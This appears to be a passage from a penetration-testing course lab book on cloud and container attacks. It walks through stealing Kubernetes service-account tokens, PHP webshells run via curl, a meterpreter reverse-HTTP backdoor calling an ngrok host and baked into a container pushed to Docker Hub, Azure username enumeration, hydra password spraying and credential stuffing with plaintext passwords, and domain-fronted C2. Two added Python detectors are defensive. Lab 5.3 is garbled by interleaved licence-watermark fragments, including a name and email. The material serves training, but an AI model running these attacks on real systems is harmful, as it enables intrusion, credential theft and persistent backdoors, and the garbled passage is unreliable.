The secret you are looking for will be of the following TYPE: kubernetes.io/service-account-token

Record the following values

Certificate:

$ kubectl get secrets <secret name> -o jsonpath='{.data.ca\.crt}'

Token:
$ kubectl get secrets <secret name> -o jsonpath='{.data.token}' | base64 --decode

Alternatively, if you didn't have access to the Kubernetes API itself with kubectl but had access to the container, the values are found there.

Do not do this, but the command below would be run from within the container. Below is an example.

root@<container># ls /var/run/secrets/kubernetes.io

The ca.crt and token are the two items found there. Normally these two items would not cause an issue, as every Kubernetes node needs to speak back to the API server. This is of course unless someone has loosened that restriction. How could we internally or externally leverage these types of credentials?

The command below continues the previous commands.

$ cat /home/sec588/.kube/config | grep server

In here you will see a value called:

server:

Copy this value and create a new config file.

Place the certificate value within the 'certificate value' section of kubetest without the quotes '. Place the server value within the 'server value' section of kubetest without the quotes '. Place the token value within the 'token value' section of kubetest without the quotes '.

You now have a cryptographically signed service account login for kubernetes.

$ nano kubetest
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: 'certificate value'
    server: 'server value'
  name: development
contexts:
- context:
    cluster: development
    user: aws
  name: aws
current-context: aws
kind: Config
preferences: {}
users:
- name: aws
  user:
    token: 'token value'

To see if this runs type the following:

$ kubectl --kubeconfig ./kubetest get pods

If you can list out pods you now have a backdoored account to the Kubernetes Management system.

Conclusions

Why This Lab Is Important

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Lab 5.1: Heavy and Light Shells

Brief Intro

While many of us are not developers, we may find the need to build or operate a "heavy" or "light" shell as part of a penetration test. Understanding the difference between each of those is key to understanding how we could use an environment.

Requirements for This Lab

This lab does not require internet connectivity; the lab is self contained, running from your computer. You will need the following tools:

Curl from the command line

Wireshark, which is a GUI application.

Try It Yourself

We wanted to demonstrate the big difference between a Lightweight Shell and a bigger heavyweight shell.

1. Go into /opt/php-webshell
2. Run the following command: docker-compose up -d
3. Access the test environment with a Web Browser by going to http://localhost:8080; you will see a phpinfo() page.
4. Start Wireshark and choose the local loopback adapter.
5. Once this is all running, look at the differences between each page by looking at the following files:

$ cat /opt/php-webshell/code/webshell.php

$ cat /opt/php-webshell/code/lightshell.php

$ cat /opt/php-webshell/code/auth.php

6. Execute the following minimum commands in each one of these shells:

ls
cat /etc/passwd
env
id

Try and do it in a single command and make the output 'pretty'; see how the more you add, the more the shell changes in Wireshark.

Walkthrough

Setting up the environment

Let's open the MATE terminal so that we can get our local environment running.
We have provided you with non-production single webshell examples running on our machine.

webshell.php: Whatever you pass to x= in the URL will be run as a command.

lightshell.php: Whatever PHP code you paste into the POST in the x variable will be run as PHP code; this is different than webshell.php.

auth.php: The same as lightshell.php, but you need to provide an HTTP Authorization Bearer token.

Now that we understand each, let's start our docker instance.

$ cd /opt/php-webshell

$ docker-compose up -d

This should reflect that two containers are now running in your environment.

Let's open a Firefox browser to validate what we are seeing by opening up firefox found on the desktop.

Navigate to http://localhost:8080

Let's open up Wireshark as well; the easiest way to do this is to open up another MATE shell.

From here you can type:

$ sudo wireshark

To monitor our interface we can select Loopback and click on the Shark fin in the corner.

The Wireshark interface may zoom by; one of the ways you can see what is going on is to use the display filter.

If you need to see what the HTTP request is doing you can right click and choose Follow | HTTP Request.

The portion in red is the request; the portion in blue is the response. Using this you can observe each request.

Looking at the different shells

The first shell we will be looking at is the standard GET requested webshell.

In the terminal window run the following command:

$ cat /opt/php-webshell/code/webshell.php

You will see a very small shell that will execute a system command based on whatever is passed to the variable x. You can execute it like so:

$ curl http://localhost:8080/webshell.php?x=ls

If we look at Wireshark what you will see is a very small request with a large response:

Given this, let's run a few other commands so that you can see how the system works:

$ curl http://localhost:8080/webshell.php?x=id

$ curl http://localhost:8080/webshell.php?x=env

$ curl http://localhost:8080/webshell.php?x=cat+/etc/passwd

Now let's try the next command:

$ curl http://localhost:8080/lightshell.php

You will just see a Hi. To see why, let's go ahead and cat out the file:

$ cat /opt/php-webshell/code/lightshell.php

In the file you will see a string:

eval($_POST['x']);

What this is telling the system is that whatever is being sent in a POST request after x must be evaluated as PHP.

How can we use such a strange shell?

$ curl -d 'x=system("ls");' http://localhost:8080/lightshell.php

Let's add many other commands:
$ curl -d 'x=system("ls;id;env;cat /etc/passwd");' http://localhost:8080/lightshell.php

Here what we see is that the commands are bigger; we are just sending system commands, but entire PHP scripts can be sent in for evaluation at runtime.

You can always look at Wireshark and see the sizes. Obviously the response sizes will be large, but the request sizes are now growing, because these shells are very lightweight on the server but can be very large on the network and on the client.

There are a few problems with this shell.

1. It's not encrypted in any way; even if you wrap HTTPS around it, that can be intercepted in a Proxy.
2. The shell has no access control; anyone can run it.

We are going to add access control. Open the auth shell:

$ cat /opt/php-webshell/code/auth.php
This shell features a very interesting set of lines:

if ($_SERVER['HTTP_AUTHORIZATION'] == 'Bearer 12345') {
....
if(isset($_POST['x'])) {

We have two different checks here; first we need an HTTP Header:

Authorization: Bearer 12345

This is a statically weak password, but still it's not a bare shell. You also need to POST to 'x' just like in the previous example. Let's explore this.

We can copy one of the previous --data POST commands from before and modify it to change the URL and add the header.

$ curl --header 'Authorization: Bearer 12345' -d 'x=system("id");' http://localhost:8080/auth.php

We now have an authorization based header. No one would want to hack this way, not really; however, if we are in the middle of choosing an operation and choosing a shell, here are the properties of a Web Shell you want:

1. If it's a lightweight shell there will be less evidence on the host; if there is a heavy shell, all of your shells will have a payload that may contain things like passwords for authentication.
2. You may want to consider a shell that provides some type of authorization mechanism.
3. You may want to consider wrapping this in not just transport layer encryption such as HTTPS but also in encryption that is in the stream itself.
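The Wireshark exercise above shows what each of the three shells looks like on the wire; the defender's counterpart is recognising those shapes in captured requests. The classifier below is an added example for this lab (not course code and not from the php-webshell project): it takes raw HTTP request text as shown by Wireshark's Follow view and flags a command in a GET parameter, PHP execution functions in a POST body, and a short static Bearer token on a PHP endpoint. SAMPLE_REQUESTS is constructed from the curl commands in this walkthrough, and MIN_TOKEN_LEN is a heuristic threshold chosen here.

```python
"""Classify captured HTTP requests for the three shell shapes in this lab:
a command in a GET parameter (webshell.php), PHP code in a POST body
(lightshell.php), and the same behind a static Bearer token (auth.php).

Added example for this lab; not course code and not from the php-webshell
project. Input is raw request text as shown by Wireshark's "Follow" view;
SAMPLE_REQUESTS below are constructed from the curl commands in the lab."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Utilities an operator typically runs first through a command shell.
RECON_COMMANDS = {"ls", "id", "env", "cat", "whoami", "uname", "pwd", "ps"}
# Shell metacharacters that chain or substitute commands.
COMMAND_CHAINING = re.compile(r"[;&|`$]")
# PHP functions that execute a string as code or as a system command.
PHP_EXEC_FUNCS = re.compile(
    r"\b(system|exec|shell_exec|passthru|eval|popen|proc_open)\s*\(", re.I)
# Heuristic: a real bearer token is long and random; 'Bearer 12345' is not.
MIN_TOKEN_LEN = 16


def parse_http_request(raw):
    """Split one raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def looks_like_command(value):
    """True if a parameter value reads like a shell command line."""
    value = unquote_plus(value).strip()
    if not value:
        return False
    first_word = value.split()[0].rsplit("/", 1)[-1]  # '/bin/ls' -> 'ls'
    return first_word in RECON_COMMANDS or bool(COMMAND_CHAINING.search(value))


def classify_request(raw):
    """Return the list of indicators found in one request (empty = clean)."""
    req = parse_http_request(raw)
    url = urlsplit(req["target"])
    findings = []
    if not url.path.endswith(".php"):
        return findings
    # webshell.php shape: the command travels in the query string.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if any(looks_like_command(v) for v in values):
            findings.append(f"GET parameter '{name}' carries a shell command")
    # lightshell.php / auth.php shape: PHP source travels in the POST body.
    if req["method"] == "POST" and PHP_EXEC_FUNCS.search(unquote_plus(req["body"])):
        findings.append("POST body contains a PHP code-execution call")
    # auth.php shape: a fixed, short secret used as a bearer token.
    auth = req["headers"].get("authorization", "")
    scheme, _, token = auth.partition(" ")
    if scheme.lower() == "bearer" and 0 < len(token.strip()) < MIN_TOKEN_LEN:
        findings.append("short static Bearer token on a PHP endpoint")
    return findings


# Constructed wire-level forms of the lab's curl commands plus one benign page load.
SAMPLE_REQUESTS = {
    "webshell_get": (
        "GET /webshell.php?x=cat+/etc/passwd HTTP/1.1\r\n"
        "Host: localhost:8080\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n"),
    "lightshell_post": (
        "POST /lightshell.php HTTP/1.1\r\nHost: localhost:8080\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\n"
        'x=system("ls");'),
    "authshell_post": (
        "POST /auth.php HTTP/1.1\r\nHost: localhost:8080\r\n"
        "Authorization: Bearer 12345\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\n"
        'x=system("id");'),
    "benign_get": "GET /index.php?page=home HTTP/1.1\r\nHost: localhost:8080\r\n\r\n",
}


def classify_samples():
    """Run the classifier over every constructed sample."""
    return {name: classify_request(raw) for name, raw in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, findings in classify_samples().items():
        print(f"{name}: {findings or 'clean'}")
```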

Conclusions

The ability for us to validate and understand the changes that occur in the most sensitive parts of our infrastructure environments will be paramount to understanding what is occurring in the overall architecture. Are defenders monitoring the most sensitive and critical files in their network? Is there something that they can do to make the environment better? This includes modifications to Docker files and .travis.yml files, which are very sensitive files in an organization.

In Lab 4.1 we should have reverted this ssh configuration file; please make sure this is done.

$ nano /home/sec588/.ssh/config

Please make it reflect the following:

host github.com
  Hostname github.com
  IdentityFile ~/.ssh/sec588-wiki-vm-keys
  #IdentityFile /home/sec588/.ssh/day4
  User git

This will allow wiki-updater.sh to work.

Why This Lab Is Important

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 5.2: Backdooring Containers

Brief Intro

This lab will introduce you to the concept of a backdoored container. There are many different ways in which you can do this, but we are going to show some of the gotchas that you will encounter.

Requirements for This Lab

In this lab we will be creating an ngrok account for port forwarding TCP Traffic.

The following are the requirements for this to work:

access to ngrok.io

access to an email account that you can register with ngrok.io

Metasploit Framework must be in the /opt/metasploit-framework directory

Docker will be running on your host.

Please note this lab will rely heavily on Metasploit Meterpreter. Running any host antivirus on your host may inhibit the ability to execute meterpreter. Please remove that antivirus as required by the Course Requirements.

Try It Yourself

To do this lab yourself, and be prepared for other labs:

1. Create an ngrok account on their website
2. Register your local ngrok with that account so that the authtoken works
3. Build a meterpreter payload that will execute against your ngrok hostname.
4. Run it from within your VM
5. Build a Container that will execute the same payload from within the container.

Walkthrough

Setting up the environment

Let us begin by working on getting us a valid ngrok key. To do this open Firefox:

Navigate to www.ngrok.com. This will provide you with a page to sign up for a valid ngrok account; click SIGN UP.

From here sign up for an account:

Once you are logged in, you can now copy the authtoken in step 3.

The next part will be to add the authtoken and test it. To do this you will need to open a terminal.

From here you will need to type the following:

ngrok authtoken <string from the above step>

ngrok http 9999

If this worked correctly you should see a screenshot somewhat similar to below:

The URL is random for every student. Let's see how we can use this as a webserver.

Open another MATE terminal:

$ cd /tmp

$ python -m 'SimpleHTTPServer' 9999

Now go back to the Firefox Browser and go to:

http://<random-ngrok-hostname>.ngrok.io

The attack we are going to execute will look like the diagram below, and yes, it is a circular-like attack:

What you should see on the screen is something like so:

Building a Linux Backdoor

To build a meterpreter linux backdoor, let's first play on our system.

Keep ngrok running.

CTRL-C or close the Python SimpleHTTPServer terminal window.

Once you do this, you can either open a new window or continue in the same window.

First is building our backdoor; with msfvenom we will create a standard stageless meterpreter.

$ mkdir /home/sec588/files/workdir/container

$ cd /home/sec588/files/workdir/container

What follows here below with the ngrok hostname is without the HTTP.

$ /opt/metasploit-framework/msfvenom -p linux/x86/meterpreter_reverse_http LHOST=<ngrok-hostname> LPORT=80 -f elf -o a

$ chmod a+x ./a

This should complete successfully like below:

To test it we need to set up our Metasploit Console; open a new shell:

$ sudo /opt/metasploit-framework/msfconsole

Must be sudo for this to work.

msf5> use exploit/multi/handler
msf5> set PAYLOAD linux/x86/meterpreter_reverse_http
msf5> set LPORT 9999
msf5> set LHOST 0.0.0.0
msf5> exploit -j

To test this payload we can go into our original shell and run the following command:

$ ./a

This should execute our payload, and in our metasploit window we should see a new session created.

Once you have the executed payload working you can now interact with the system:

msf5> sessions -i 1

meterpreter> sysinfo

If the system returns information you have a working backdoor; type exit in the metasploit meterpreter session.

You need to exit the metasploit meterpreter session, not the msfconsole itself.

CTRL-C in the ./a window.

Building a backdoor container

Let's now build an example of an evil container to execute our payload. Open a text editor to create the following file:

$ nano /home/sec588/files/workdir/container/Dockerfile

Inside of it type the following:

FROM ubuntu:latest
RUN apt update -y && apt-get install curl wget -y
COPY a /bin/a
CMD ["/bin/a"]

CTRL-X in nano will close the file. Now we will need to build our container:

$ docker build -t studentX-a .

Once this builds, you will then locate the docker image:

$ docker image ls

Let's execute our container; record the latest image id and put it in the following command:

$ docker run -it -d <docker image id>

The container will appear broken; just leave this window running for a minute, it will not show you a prompt. The container should now be running; let's attach to that process.

In a NEW window type:

$ docker ps

You will see a ContainerID; copy that number and run the following command:

You may find that every once in a while the system will no longer connect. This is a problem with ngrok, and as such you may have to: exit ngrok, restart it, and rebuild your msfvenom command with the new URL.

Switch over to the metasploit console window. We can now execute the following commands from within msfconsole:

You may have to hit enter to get the msf5> prompt

msf5> sessions -l

msf5> sessions -i <#>

meterpreter> sysinfo

meterpreter> ps

This provides us a nice way to slide a backdoor into a container registry if we want to.

If you have extra time

There is a way to copy a container into a public registry like Docker Hub, as an example.

1. Register an account with Dockerhub (http://hub.docker.com).
2. Record your username with dockerhub. Example: mosesrenegade is the author's.
3. Copy your container into the Dockerhub system. You will need to:

$ docker login

$ docker build -t <yourDockerHubUsername>/<yourContainerNameFromAbove> .

For example, the instructor would use:

docker build -t mosesrenegade/student9001-a .

You will then need to push that image into your repository:

$ docker push <yourDockerHubUsername>/<yourContainerNameFromAbove>

4. Please note the container name <yourDockerHubUsername>/<yourContainerNameFromAbove>

5. Download the YAML file: online wiki (http://wiki.<class-subdomain>.sec588.net/files/kubs.yaml) or the local wiki (http://localhost/wiki/files/kubs.yaml)

6. Edit the YAML so that we can run it in the container; replace the XXXX with your student number. Replace the DOCKERNAME/DOCKERCONTAINER information with your docker information. Here is an EXAMPLE (do not copy and paste, it will not work).

For reference, replace the items below:

run: student9001-a # This was replaced
name: student9001-a # This was replaced
run: student9001-a # This was replaced
run: student9001-a # This was replaced
- image: mosesrenegade/student9001-a # Containername

7. To see if you have kubectl working type the following:

kubectl get pods

8. If you find that you are having challenges with that, you can do the following to restore your kubeconfig.

#!/bin/bash
rm -Rf /home/sec588/.kube/config
aws eks update-kubeconfig --name class-eksctl-<class-subdomain> --region us-east-1 --profile lab22

9. To apply the yaml file and run your container in kubernetes:

kubectl apply -f kubs.yaml

10. You should go back to your metasploit session, and if you find that Metasploit is not able to run, use the following to restart the job:

msf5> exploit -j

It could be that exploit multi-handler did not work. This would fix it.

Troubleshooting

Common issues include: kubectl get pods and you get the following issue:

CrashLoopBackOff

This is usually something wrong with the container build. Run your container from your sec588 virtual machine and make sure it still connects!

Alternatively, if you see the following CrashLoopBackOff or ImagePullBackOff and don't see an issue, do the following:

Get your pod name:

kubectl get pods

Then describe your pod:

kubectl describe pods <podname>

Look at the errors to see if the image isn't pulling or the container isn't running.

Conclusions

We may wish to deploy a container with a backdoor; this may allow us to bury a container very deep into an environment so that we can start to laterally pivot and move around. Given that we may be in this scenario, it is critical for us to understand how to build containers correctly.
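The Dockerfile built in this lab has every signal an image review should catch before a push or a `kubectl apply`: a base image pinned only to :latest, packages installed without versions, an unknown binary copied onto PATH and made the CMD, and no USER. The linter below is an added example for this lab (not course code); SAMPLE_DOCKERFILE is the lab's Dockerfile as typed above, and HARDENED_DOCKERFILE is a constructed contrast that passes every check.

```python
"""Review a Dockerfile for the signals that make the image built in this lab
suspicious: an unpinned base image, an unreviewed binary copied onto PATH and
made the entrypoint, unpinned package installs, and no USER.

Added example for this lab; not course code. SAMPLE_DOCKERFILE is the lab's
Dockerfile; HARDENED_DOCKERFILE is a constructed contrast."""
import re

# Directories on the default PATH: a binary dropped here and set as CMD is the
# backdoor shape this lab builds.
PATH_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")
APT_INSTALL = re.compile(r"\bapt(-get)?\s+install\b")


def parse_dockerfile(text):
    """Yield (INSTRUCTION, arguments) pairs, joining backslash continuations
    and skipping blank lines and comments."""
    pending = ""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.endswith("\\"):
            pending += stripped[:-1] + " "
            continue
        instruction, _, args = (pending + stripped).partition(" ")
        pending = ""
        yield instruction.upper(), args.strip()


def command_tokens(args):
    """Tokens of a CMD/ENTRYPOINT in exec form (JSON array) or shell form."""
    if args.startswith("["):
        return re.findall(r'"([^"]*)"', args)
    return args.split()


def base_image_pinned(image):
    """Pinned means a digest, or a tag other than :latest."""
    if "@sha256:" in image:
        return True
    tag = image.rsplit("/", 1)[-1].partition(":")[2]  # tag of the last path segment
    return bool(tag) and tag != "latest"


def audit_dockerfile(text):
    """Return a list of human-readable findings for one Dockerfile."""
    findings = []
    copied = {}       # destination path -> source, for COPY/ADD
    saw_user = False
    for instruction, args in parse_dockerfile(text):
        if instruction == "FROM":
            image = args.split()[0]
            if not base_image_pinned(image):
                findings.append(f"FROM {image}: base image not pinned to a tag or digest")
        elif instruction in ("COPY", "ADD"):
            parts = args.split()
            if len(parts) >= 2:
                src, dst = parts[-2], parts[-1]
                copied[dst] = src
                if dst.startswith(PATH_DIRS):
                    findings.append(f"{instruction} {src} -> {dst}: file placed on PATH, provenance unknown")
        elif instruction == "RUN":
            if APT_INSTALL.search(args) and "=" not in args:
                findings.append("RUN apt install without version pins")
        elif instruction == "USER":
            saw_user = True
        elif instruction in ("CMD", "ENTRYPOINT"):
            tokens = command_tokens(args)
            if tokens and tokens[0] in copied:
                findings.append(f"{instruction} runs {tokens[0]}, copied in from {copied[tokens[0]]}")
    if not saw_user:
        findings.append("no USER instruction: processes run as root")
    return findings


# The Dockerfile from this lab.
SAMPLE_DOCKERFILE = """FROM ubuntu:latest
RUN apt update -y && apt-get install curl wget -y
COPY a /bin/a
CMD ["/bin/a"]
"""

# Constructed contrast: pinned base, pinned package, unprivileged user.
HARDENED_DOCKERFILE = """FROM ubuntu:20.04
RUN apt-get update && apt-get install -y curl=7.68.0-1ubuntu2
USER nobody
CMD ["/usr/bin/curl", "--version"]
"""


def audit_sample():
    """Audit the lab's Dockerfile."""
    return audit_dockerfile(SAMPLE_DOCKERFILE)


if __name__ == "__main__":
    for finding in audit_sample():
        print("[!]", finding)
```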

Why This Lab Is Important

This lab takes what is a seemingly well known backdoor like meterpreter and lets us execute that in the context of a container.

Additional Resources

SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec560)

Lab 5.3: Username
3e1e3b497543e6c11ac8e4188959c93e
Enumeration and Pivot
Setup

20
, 20
28
pauljones166@outlook_com
Brief Intro

ly
Ju
>
CDN Networks and Proxies are ubiquitous on the Internet today. The industry term for many of these devices

om
tend to be of one of the following:

_c
ok
1. Caching Devices
2. Proxies
3. Middleboxes
23169600 @
ou
tlo
66

Given that most tra c today is encrypted decrypting each packet is almost universally impossible. In some
s1

cases, it is not just cost-ine ective, but it also impossible when dealing with Desktop Applications. Many of the
ne

organization's content ltering devices leverage SNI information to lter but not decrypt the tra c. An attacker
ljo

Gregg Harris
can hide in their tra c sources by leveraging the CDN networks proxies to redirect attacks to their C2
au

environments.
<p
s
rri

These types of attacks are known as Domain Fronting, and we will be performing this attack today. To perform
Ha

this attack, we need to be able to control a CDN endpoint; for part one of our attack, we need to set up the CDN
Networks in Azure. Azure does still support Domain Fronting, and since our CDN shares the same system like
gg

the Microsoft CDN, we will be able to hide our tra c using Microsoft CDN systems.
re

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G

Requirements for This Lab


To
d
se

This lab requires a Web Browser and Access to Microsoft Azure.


n
ce
Li

Try It Yourself
live
To try this lab yourself you need to perform the following steps:

1. Figure out what users are alive in the Azure Portal by trying di erent usernames and observe the results.
2. Log in with a Valid User.

© 2020 Moses Frost 241


3. Set up a CDN Profile with an Endpoint to an HTTP ngrok destination.
4. Call the profile: studentX-sec588
5. Call the endpoint: studentX-sec588
6. Use port 8080: start a SimpleHTTPServer on port 8080 in the php-webshell directory.
7. The CDN endpoint is used in a future lab.

Walkthrough

Finding the users in our environment.

Use Firefox to complete the following steps:

Go to: https://portal.azure.com

Come up with 5-10 random American/English first names, for example:

mike
will
dustin
lucas
nancy
barb

Append the following domains:

sec588.net
sec588.org
sec588.com

For example:



mike@sec588.net
mike@sec588.org
mike@sec588.com

Do any of these work? What is the difference in the login prompt when the following is used:

jerry@sec588.com

Setting up the environment

Let's open the MATE terminal so that we can get our local environment running.



Now let's test our 'Domain Fronting' attack; to do this, let's first start listening on an ngrok port. The first part is to listen on 8080. Let's move to a web directory:

Make sure that docker-compose is down.

$ cd /opt/php-webshell

$ docker-compose down

Get into our code directory.

$ cd /opt/php-webshell/code

$ python -m 'SimpleHTTPServer' 8080

Open another terminal and start ngrok:

$ ngrok http 8080

On the first terminal type the following:

$ az login -u jerry@sec588.com -p HumanMusic2019

Now that we are logged in as Jerry again, let's set up a CDN network for the second part of our lab. This will take some time to set up, so we will do this first:

az cdn profile create --name studentX-sec588 --resource-group <class-subdomain>-resources --location eastus --sku Standard_Verizon

This will create a profile for us to use with our Endpoints:

az cdn endpoint create --name studentXsec588 --profile studentX-sec588 --origin <ngrok URL> --resource-group <class-subdomain>-resources --query-string-caching BypassCaching

The following is an instructor example so students can validate what their command line may look like.

az cdn profile create --name student9001-sec588 --resource-group <class-subdomain>-resources --location eastus --sku Standard_Verizon



az cdn endpoint create --name student9001sec588 --profile student9001-sec588 --origin abc231abc23.ngrok.io --resource-group <class-subdomain>-resources --query-string-caching BypassCaching

Once this is set up, we will then need to use the Azure Portal to finish setting up the endpoint, as not every feature is available over the az cli.

Use Firefox to complete the following steps:

Go to:

https://portal.azure.com

Log in as the Jerry user to be able to perform the operations to add a CDN into the system.

From the Azure Portal Search button type: cdn

The CDN Profiles area should show up:

Once in this menu, navigate to:

studentX-sec588 | Click the studentXsec588.azureedge.net endpoint

Once you are in the Endpoint configuration, you need to change two options.

Click on the Origin menu and add the Origin Host Header. CLICK SAVE



Click on the Caching Rules menu and change the Cache Behavior to Bypass Cache.

CLICK SAVE

From this point on, the ngrok HTTP window should not be closed. This URL is dynamic and is currently tied to your CDN. This process takes anywhere from 10 minutes to 60 minutes to be made available on the internet. If you close the ngrok HTTP window, Lab 5.5 may take longer than expected.

This may take up to five minutes to propagate, please give it some time.

Conclusion

In this lab, we have demonstrated how we can perform username enumeration, which is a key component of username and password guessing attacks. We have also started the setup of our CDN Domain Fronting lab, which is a requirement for Lab 5.5.



Lab 5.4: Credential Stuffing Lab

Brief Intro

We wanted to make sure that all of our students understand the importance of a few things. First, why Multi-Factor Authentication is critical in any environment, by performing a password guessing attack. Secondly, we would like our students to better understand why this methodology works. Third, we want to demonstrate how to actually perform a Credential Stuffing attack, as many of these attacks are still relatively unknown.

Requirements for This Lab

This lab requires a few items:

1. hydra, the command line tool
2. pw-inspector, the command line tool
3. You will need the rockyou-10k.txt file at /home/sec588/files/wordlists/rockyou-10k.txt

Try It Yourself

To try this yourself you will do the following.

1. Run az vm list-instances and obtain the PublicIpAddress for the dc1 host.
2. The dc1 host has RDP enabled.
3. Build a list of known users; consider what you know about the environment: administrator, jerry, summer, george, azure, sec588.
4. Create a special wordlist called /tmp/rockyou-small.txt by using pw-inspector.
5. Use pw-inspector to trim the wordlist to the default Windows 2019 password complexity rules: lowercase, uppercase, numbers, special characters, and three of the four combinations. Remember you will probably need a minimum
6. Next trim the wordlist to the first 10,000 lines: cat /tmp/rockyou-small.txt and place the results in a wordlist called /home/sec588/files/workdir/rockyou-smaller.txt

Walkthrough



Setting up the environment

Let's open the MATE terminal so that we can get our local environment configured:

On the first terminal type the following:

$ cd /home/sec588/files/wordlists

Let's look at the wordlist called: rockyou.txt

$ wc -l rockyou.txt

You should see:

14344391 rockyou.txt

The next item is to take pw-inspector and make the following modifications:

$ pw-inspector -i rockyou.txt -o /tmp/rockyou-small.txt -m 8 -M 16 -c 3 -l -u -n -p



Next we will count the number of words in this smaller file:

$ cat /tmp/rockyou-small.txt | wc -l

This should now be ~750,000 lines:

734298 /tmp/rockyou-small.txt

The next step is to carve this down to 10,000 lines:

$ cat /tmp/rockyou-small.txt | head -10000 > /home/sec588/files/workdir/rockyou-smaller.txt

This wordlist is now 10,000 lines long. This is considerably smaller than what we started with. Let's see how even this small wordlist is not sufficiently fast for our purposes.

Let's now get a PublicIpAddress.

Getting our target IP address

The easiest way for us to find our IP addresses in Azure is to run the following command. The syntax is less than ideal, unfortunately.



az vm list-ip-addresses --query '[].virtualMachine.[ name, network.publicIpAddresses[0].ipAddress ]' -o table --resource-group <class-subdomain>-resources

This will display the computers on the left and the IP addresses on the right.

Copy the DC1 IP address as it will be our target.

Hydra Users and Passwords

Let's attempt to build a users file that we can work with:

$ nano /home/sec588/files/workdir/users.txt

In this file, let's create a line by line list:

administrator
admin
summer
jerry
sec588
george

Why these words? Well, in previous labs we had a user named summer, we had one named jerry, we also have some standard ones like administrator and admin, and for fun we are throwing the class name in here. Sometimes usernames for service accounts end up being company names, project names and the like.

Let's review what we now have:

username file: /home/sec588/files/workdir/users.txt

password file: /home/sec588/files/workdir/rockyou-smaller.txt



target ip: <publicIpAddress> from above

Standard Dictionary Attack

The first attack will be a standard dictionary attack:

NOTE: THIS ATTACK WILL NOT FINISH. Read on after you hit ENTER.

$ cd /home/sec588/files/workdir

$ hydra -L users.txt -P rockyou-smaller.txt -t 4 rdp://<publicIpAddress>

This will take a long time to work; by our estimation, after 2 or 3 minutes you will see a [STATUS] message. If you read it, it will state that you will find your password after 1.5 to 2 hours. Let's see the difference between this and maybe a more targeted attack:

Let's now try a password attack that is more targeted, with a targeted wordlist.

Targeted Wordlist

Let's build the following wordlist:

$ nano /home/sec588/files/workdir/password-target.txt

Spring2018
Summer2018
Fall2018
Winter2018
Spring2019
Summer2019
Fall2019
Winter2019
Spring2020

$ hydra -L users.txt -P password-target.txt -t 4 rdp://<publicIpAddress>



This attack will take less than 5 minutes, as it's now only 54 attempts. You could slow this down to meet a password policy and avoid lockout, which is a hugely critical item.

Credential Stuffing Slow Attack

Finally, let's show you how to build a credential stuffing attack.

$ nano /home/sec588/files/workdir/stuffing.txt

Administrator:Administrator
admin:admin
summer:SnakeJazz2020
jerry:HumanMusic2019
sec588:Winter2019

So here we have an extremely targeted wordlist, only 1 attempt per user. This is arguably faster than what we had before.

$ hydra -C stuffing.txt -t 4 -W 1 rdp://<publicIpAddress>

This works our methodology in reverse. How would we do this in the real world:

1. Build a list of users; there may be some guessing here, or you may be informed.
2. Build a list of passwords that each user may have used; this may have been through exposed password leaks.
3. Once the list is exhausted, attempt to guess common passwords.
4. You can also build a targeted wordlist using a tool like CeWL.
5. Once both of these options are done you can move into larger dictionary lists.

Remember you do not need to crack ALL the users' accounts; typically you need one or more.

Conclusions

This lab was designed to cover a critical component of penetration testing, and that is the use of passwords, credential stuffing, and targeted wordlists in a penetration test. Passwords are a critical part of testing; don't disregard it.

Sometimes you will find a list of usernames and passwords in larger lists; other times you will find that users have very predictable passwords over time. Keep this in mind.

Why This Lab Is Important

You seldom find valid and good information on using good password tools against live targets. The information is not always available to you, and it's almost certainly not well documented at times. This lab helps you start working through these issues.

Additional Resources

SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec540)



Lab 5.5: C2 Redirections and Obfuscations

Brief Intro

In Lab 5.3, it was discussed that CDNs are a critical component of the internet. They allow content providers to move large datasets much closer to the end-user. Content Delivery Networks quite often are built of proxies and proxy-like technologies. These proxies, however, are front-ending almost all customers, typically in a shared environment, for scalability. How does a shared proxy system move traffic from its front door over to the actual system?

The Host: header directs the traffic accordingly. Here is an example:

Going to do.skype.com, the packets are formulated to resolve this to the Azure CDN server: example.azureedge.net.

The HTTP header is formulated as so:

GET / HTTP/2
Host: do.skype.com

What if we ask our system to go to https://do.skype.com, yet redirect the Host: header to our EvilC2?

The system formulates a request to do.skype.com. The traffic does forward to azureedge and potentially, depending on the system, includes do.skype.com as the SNI in the certificate exchange. The proxy will redirect the traffic to us.

Why would we want to do this? To hide our real intent and evade proxies.

Requirements for This Lab



This lab requires that Lab 5.3 is completed so that the Azure CDN network is now built and made available for you to use.

One of the other important things about this lab is that you do not close or interfere with the ngrok http process. Aside from Internet connectivity, the lab is self contained, running from your computer. You will need the following tools:

Curl from the command line

Try It Yourself

We wanted to demonstrate the big difference between a lightweight shell and a bigger heavyweight shell.

1. Make sure you can get to your machine using the Azure CDN.
2. Call the profile: studentX-sec588
3. Call the endpoint: student1-sec588
4. Use port 8080: start a SimpleHTTPServer on port 8080 in the php-webshell directory.
5. While this builds, switch to the socat lab.
6. At this point the CDN should be available; run the following commands:

curl to download the azureedge endpoint to make sure you can access your webshell directory

curl to download the same endpoint to make sure you can get the Host header pointing to azureedge but the request going to do.skype.com.

Walkthrough

Setting up the environment

Let's open the MATE terminal so that we can get our local environment running.



Make sure that the ngrok system is running.

In the new window, let's make sure that we are still running the python server.

Make sure you have a window with the following command still running:

$ python -m 'SimpleHTTPServer' 8080

